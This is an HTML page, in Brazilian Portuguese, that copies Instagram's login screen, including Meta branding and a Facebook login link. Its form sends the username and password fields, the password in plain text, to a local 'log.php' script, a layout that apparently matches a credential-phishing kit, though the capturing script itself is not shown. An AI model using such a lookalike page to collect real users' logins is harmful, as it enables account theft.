<!DOCTYPE html>
<html lang="pt-br">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="stylesheet" media="screen" href="./style.css" />
    <title>Instagram clone</title>
    <style type="text/css">
      body{
        background-color: #fafafa;
      }
      input{
        background-color: #fafafa;
      }
      form #login_button {
  margin: 0 0 25px;
  height: 30px;

  color: #FFFFFF;
  background-color: #4cb4f7;
  border: 0px;
  border-radius: 6px;

  font-weight: 700;
  font-size: 14px;
  line-height: 18px;
}
.es{
  font-size: 12px;
}
.dd{
   color: #909090;
}
.ou{
  color: #8e8e8e;
}
      
    </style>
  </head>
  <body>
    <main>
      <article>
        <div class="smartphone">
          <img src="./images/smartphone.png" alt="">
        </div>
        <div class="login">
          <div class="login_1">
          <img src="./images/Logo.png" alt="Logo do Instagram" />
          <form method="post" action="log.php">
            <input
              type="text"
              name="email"
              id="login_input"
              placeholder="Telefone, nome de usuário ou email"
            />
            <input
              type="text"
              name="password"
              id="password"
              placeholder="Senha"
            />
            <input class="bt" type="submit" value="Entrar" id="login_button" />
          </form>
          <div class="line">
            <div></div>
            <p class="ou">OU</p>
            <div></div>
          </div>
          <div class="loginface">
            <a href="facebook/index.html"
              ><img src="./images/Logoface.png" alt="Logo Do Facebook" /> Entrar com o Facebook</a
            >
          </div>
          <a class="es" href="">Esqueceu a senha?</a>
          </div>
        
          <div>
            <p id="signup">Não tem uma conta? <a href="">Cadastre-se</a></p>
          </div>
          
          <div class="getapps">
            <p>Obtenha o aplicativo.</p>
  
            <div class="apps">
              <img src="./images/Google Play.png" alt="Logo do Google Play" />
              <img src="./images/Microsoft.png" alt="Logo da Microsoft" />
            </div>
          </div>
            
        </div>
      </article>
      
    </main>

    <footer class="dd">
      <div id="links">
        <p class="line1">Meta
Sobre
Blog
Carreiras
Ajuda
API
Privacidade
</p>

        <p class="line2">Termos Principais.contas
Localizações
Instagram.Lite</p>

        <p class="line3">Carregamento de contatos e não usuários</p>

        <p class="line3">
            Português (Brasil)
            <svg
              width="11"
              height="6"
              viewBox="0 0 11 6"
              fill="none"
              xmlns="http://www.w3.org/2000/svg"
            >
              <path
                d="M0.50002 0.249012C0.565688 0.248944 0.630722 0.261851 0.691386 0.286993C0.75205 0.312134 0.807151 0.349013 0.85352 0.395512L5.00002 4.54351L9.14652 0.395512C9.19264 0.347757 9.24782 0.309666 9.30882 0.283461C9.36982 0.257257 9.43543 0.243464 9.50182 0.242887C9.56821 0.24231 9.63405 0.254961 9.6955 0.280101C9.75695 0.305242 9.81277 0.342368 9.85972 0.389314C9.90666 0.436261 9.94379 0.492087 9.96893 0.553535C9.99407 0.614983 10.0067 0.680823 10.0061 0.747213C10.0056 0.813602 9.99178 0.879212 9.96557 0.940214C9.93937 1.00122 9.90128 1.05639 9.85352 1.10251L5.35352 5.60451C5.25793 5.69474 5.13146 5.745 5.00002 5.745C4.86858 5.745 4.74211 5.69474 4.64652 5.60451L0.14652 1.10251C0.0766153 1.03259 0.0290127 0.943504 0.00972843 0.846528C-0.00955582 0.749551 0.000346184 0.649035 0.0381813 0.557684C0.0760164 0.466334 0.140086 0.388254 0.222291 0.333312C0.304496 0.278369 0.401145 0.249032 0.50002 0.249012Z"
                fill="#8E8E8E"
              />
            </svg> 
          © 2023 Instagram from Meta</p>
          </p>
        </div>
       
      </div>
    </footer>
  </body>
</html>
